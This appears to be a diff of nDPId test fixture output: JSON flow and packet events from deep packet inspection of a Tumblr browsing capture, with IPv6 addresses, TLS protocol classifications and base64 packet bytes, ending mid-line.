-00715{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1605292122674,"flow_last_seen":1605292122861,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":620,"flow_tot_l4_payload_len":3283,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39164,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"}} -00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::200e","src_port":58614,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::200e","src_port":58614,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::200e","src_port":58616,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::200e","src_port":58616,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::200e","src_port":58618,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::200e","src_port":58618,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292122874,"flow_last_seen":1605292122899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40190,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292122874,"flow_last_seen":1605292122899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40190,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00724{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":62,"flow_first_seen":1605292121486,"flow_last_seen":1605292122503,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":24052,"flow_avg_l4_payload_len":387,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::4a72:9a16","src_port":43328,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tumblr","breed":"Fun","category":"SocialNetwork"}} -00719{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":289,"flow_first_seen":1605292105170,"flow_last_seen":1605292122449,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":187188,"flow_avg_l4_payload_len":647,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43420,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00719{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":326,"flow_first_seen":1605292105171,"flow_last_seen":1605292122739,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":185805,"flow_avg_l4_payload_len":569,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43434,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00667{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::df9:21c6","src_port":43602,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00611{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::df9:21c6","src_port":43602,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00675{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":28,"flow_first_seen":1605292105726,"flow_last_seen":1605292122804,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":1371,"flow_avg_l4_payload_len":48,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4c03","src_port":51874,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00619{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":28,"flow_first_seen":1605292105726,"flow_last_seen":1605292122804,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":1371,"flow_avg_l4_payload_len":48,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4c03","src_port":51874,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00735{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":63,"flow_first_seen":1605292122095,"flow_last_seen":1605292122344,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3141,"flow_tot_l4_payload_len":39546,"flow_avg_l4_payload_len":627,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200a","src_port":38608,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} -00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292120654,"flow_last_seen":1605292120853,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":55014,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292120654,"flow_last_seen":1605292120853,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":55014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":50960,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":50960,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292102219,"flow_last_seen":1605292102219,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292102219,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56592,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1605292102219,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292102219,"pkt":"qtsDr8lk5EKm5WPyht1gCcfOACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3RABu9uJhiq5D+6LgBAB9a70AAABAQgKqXs\/nsLc288="} +00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292102602,"flow_last_seen":1605292102602,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292102602,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1605292102602,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292102602,"pkt":"qtsDr8lk5EKm5WPyht1gD4BTACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXidvHABuwi2Qd5sejoTgBAk6T9pAAABAQgKJEdEAsLc4vQ="} +00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292102603,"flow_last_seen":1605292102603,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292102603,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56640,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1605292102603,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292102603,"pkt":"qtsDr8lk5EKm5WPyht1gCYSFACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3UABuxOPqDR2fQOlgBAB9XmBAAABAQgKqXtBHsLc4vw="} +00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1605292102653,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292102653,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdELkP7ovbiYYrgBALf0cxAAABAQgKwt2S76l05rw="} +00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1605292102678,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292102678,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdQHZ9A6UTj6g1gBALxQp7AAABAQgKwt2UBql09U8="} +00631{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292103804,"flow_last_seen":1605292103804,"flow_idle_time":7560000,"flow_min_l4_payload_len":664,"flow_max_l4_payload_len":664,"flow_tot_l4_payload_len":664,"flow_avg_l4_payload_len":664,"midstream":1,"thread_ts_msec":1605292103804,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2620:116:800d:21:8c6e:cf2c:8d6:9fb5","src_port":41266,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01390{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1605292103804,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":750,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":750,"pkt_l4_len":696,"thread_ts_msec":1605292103804,"pkt":"qtsDr8lk5EKm5WPyht1gDK9YArgGQCoBywEgSYsHmR3shSjf9ikmIAEWgA0AIYxuzywI1p+1oTIBu9ziFnW6Ce2BgBgB9Z0sAAABAQgKOMLyjsLdWyEXAwMCkwAAAAAAAAAEyttPIBHYl6fl6+wxakteQia67zuCx64sVbYiAEMKI1LRZB2ZjjRACezRfqMgcw8Wk8Ja+jFsbTh6PPGiWyRnZCafAJvoLbr\/QbtaCfYNT07cM7gv8MAYjagAz2\/uUXvHhHXYjVHplnNsW6sWSYWdjj7pK3cCYJyTWWk8KcaWVSPm5FJowuyKrEBg\/xvy4liO6V1qSsclVnGU5uOkFVqkiQyVPIXxSNOn3SjKKoV+GRhNjLSyOjDMf9ZrVDwqHvTDUwRZgkE5k6+v4Ngk9WrnV1ax1ubCqnHoIel2EK4gbfVvolwb83\/d3YNFV8lq1e+SHlYke+eJRKzjNIOw4b4Y36hRm5\/D2hks6V9vGkg6sSDzHRzniE1V4ce1mOtmNnefjf42UQc2HkOmWCkUVtMokEc166qSRXnlIooPlIQBw2b0stTzXYA2D5SN\/BALZmedX1SrmcVBJ4DrMf\/xHLEmuGaRjzLDgXIUB\/jHR45QJ7tyaECd\/R1pWTx+wCe3sS0fZlg4mB6GzVlIgWc0sXiXzk4KusTcJBlT6WCFzmZVXwOxGhq4mx\/Ar34HImolLoUFN3W4QPP1XuhLobsRn8+uu1UjAIOgrakq2nUZ7wxPjCRa6GR8HhsJaaSV8kQKCsWaODSJH8qsgcj27KMOqJKDEttTsUUejaBrXacD1ursBsQeG6kxeWCpc+pc+B6lF82QSaY+dqDc0x6adlVhzh25sn9xUc5gttNEqsRpcCwXleCFl5slq6Eo208ayh44XAy4\/3sSIcuuXZecriDdQNtCpH0D9WnZpbvC6F0uUd8YgEMLKpbVgkphXTjpgJPqNLHR1Jtsu8T0zduHUyA8I2rMdecA7vfO5m6vB6zg"} +00614{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292103804,"flow_last_seen":1605292103804,"flow_idle_time":7560000,"flow_min_l4_payload_len":644,"flow_max_l4_payload_len":644,"flow_tot_l4_payload_len":644,"flow_avg_l4_payload_len":644,"midstream":1,"thread_ts_msec":1605292103804,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::8fcc:d927","src_port":57286,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01367{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1605292103804,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":730,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":730,"pkt_l4_len":676,"thread_ts_msec":1605292103804,"pkt":"qtsDr8lk5EKm5WPyht1gC36AAqQGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACPzNkn38YBu3OPNREQMJOagBgB9f9ZAAABAQgKI0OBn8LdXfIXAwMCf+a7XKOkxtVKJI04EV4D3mT6IiNw5ZdwpK\/ctvLby5AnUtCRp1wz9iXgvd8CBQl59Ed1wqXQfvbQcvgr9o4GGMRVH8BPyBiK9wAHxfoair+VUOV+cUyNlvDKwuPaUh\/47DlY44LAL0vv9eo4G0vPSmnyuohMST6JkC52HBED7hDgCc5lbkYutM3P7xGL1Z5MrmmzLXVyM4doUQOUayCKfyqRux1EiZDMeHsdoHvinwuW98Zns+5LqMwEKiz9\/ZA1Iu594xbEmeMockAnjj3HmV8YsDERU2TzTk3sWn0ZhKp12Rdx11cVSOnv1ddUqmkYpF6VPIBgfZdY0+3WEYNWwp9gOeZ1SPKEW1sZa\/MZbqxYU+ge0aUNP414S6YsDr4wWnXY\/hrIPt4hdVJid3p8HC+BYX8NVuisAelA3CsslL+yrlEZs\/QElNY2EIBitMqJSsgpwlduIlvcGoykV3DYfMjS3smQ0\/HaV+vGuY59BD+HYzkVJoRFJ5+AoB\/9kz8MrwgQrulG8+mXwGs2Tz+e0pxggDcl3iaCIQO5yUqOapIz\/jo8gXQAUjpsoKRzsKjRY\/OKBL3cj5DbujlngZrs+3yRDxMp\/A8kmIYDSMjyy21do9HW47erPa0WwNSepOx56UCCZyny26AleUHgV47LLX+Hh0DKxyVNOlUl474o9ZULR18pA1FtXPbynHGzdWF0peqNAJdGXSpxCnSDK+dkiaw9fmAlL\/EwEDJgbnaFqYBoa1wzZSNmUTmn9uQt7gG5UTLglNz7Gtm2hHwfzEK4uAknhpJOuKuRvE3auX9h725wqrVluU5SCPoyvKwHHRb0nBQK3ngxp6Haaq8pgOXbmw=="} +00554{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1605292103806,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":132,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":132,"pkt_l4_len":78,"thread_ts_msec":1605292103806,"pkt":"qtsDr8lk5EKm5WPyht1gDK9YAE4GQCoBywEgSYsHmR3shSjf9ikmIAEWgA0AIYxuzywI1p+1oTIBu9ziGQ26Ce2BgBgB9dicAAABAQgKOMLykMLdWyEXAwMAKQAAAAAAAAAF+jUU1elIEFUi9UepC3cLGnJUpit7lClItBx8Gs+U4NeE"} +00546{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1605292103807,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":125,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":125,"pkt_l4_len":71,"thread_ts_msec":1605292103807,"pkt":"qtsDr8lk5EKm5WPyht1gC36AAEcGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACPzNkn38YBu3OPN5UQMJOagBgB9TxfAAABAQgKI0OBosLdXfIXAwMAIkCDsSUDRd2gtpG1ie0hMvlOrf1SL9AYeSm49w1LAyMVmmo="} +00615{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292103810,"flow_last_seen":1605292103810,"flow_idle_time":7560000,"flow_min_l4_payload_len":382,"flow_max_l4_payload_len":382,"flow_tot_l4_payload_len":382,"flow_avg_l4_payload_len":382,"midstream":1,"thread_ts_msec":1605292103810,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::98c7:1593","src_port":42908,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01015{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1605292103810,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":468,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":468,"pkt_l4_len":414,"thread_ts_msec":1605292103810,"pkt":"qtsDr8lk5EKm5WPyht1gCmLwAZ4GQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACYxxWTp5wBu7LtL87ROW\/JgBgB9bw+AAABAQgKM4zEpsLdXIMXAwMBeeuGCWF9Lb0Ci6TEBMXMSCRU5\/ujX\/oVXdGh+BNpGjYWczn5t9MnrcPf0zR8Rsvgek65i+QCA5M9xg538hLyui9336X\/wmAqUKW0ovcGHfVkBbInk26LgYglI5Td\/ssdGWORhYySPbJXLEFtu\/h1mXhj5XU6VyNxU9SBh\/8O12l+trWyWdbANDOIW9SbvtVRvHBRVZmz1ag3okb4Plbrh4Qi4B+G74t5h0\/qMYjiEuZ1+PtpSHBW9OPbPwwcOV4UZ67nf4PG8vUha9JOewT6Ihb4Yfc7EBAGx7VHrcHsn7